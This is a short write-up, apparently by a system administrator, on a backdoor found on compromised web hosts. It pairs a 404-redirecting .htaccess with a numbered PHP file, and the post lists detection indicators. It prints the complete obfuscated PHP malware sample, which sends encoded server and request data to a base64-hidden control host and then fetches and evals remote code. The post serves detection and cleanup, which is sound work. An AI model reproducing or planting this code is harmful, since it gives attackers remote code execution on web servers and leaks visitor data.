A common backdoor once a host is compromised is to create or append to existing .htaccess files a 404 redirect which will open a remote shell to a control server when the .php is hit, usually due to legitimate crawling.  Attackers will intentionally backlink to nonexistent url’s on the compromised host so that Google et al will do the job of opening a remote shell to their control node.  A symptom of this is a spike in load and the amount of connections in the WAITING state when being crawled.

The pair of .htaccess and .php is usually generated into every single folder with unique filenames.  The filename of the php shell is usually a 4-6 character number but will sometimes be a reused dictionary regex.  The .htaccess always contains string “ErrorDocument 404 //” with two forward slashes leading the filename.  The .htaccess is usually less than 200 bytes:

Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php

There is little variation in the php number shell; usually the payload and destination.  A common file size is 1474 bytes and a common string is ‘aHR0cDov’ which is the base-64 encoding of ‘http:/’.

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z=”/?”.base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.e.”.base64_encode($i).”.”.base64_encode($j);$f=base64_decode(“cGhwc2VhcmNoLmNu”);if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])==”a23ab92502c0050082dd96a32c754520″) $f=$_REQUEST["id"];if((include(base64_decode(“aHR0cDovL2FkczIu”).$f.$z)));else if($c=file_get_contents(base64_decode(“aHR0cDovLzcu”).$f.$z))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcxLg==”).$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

•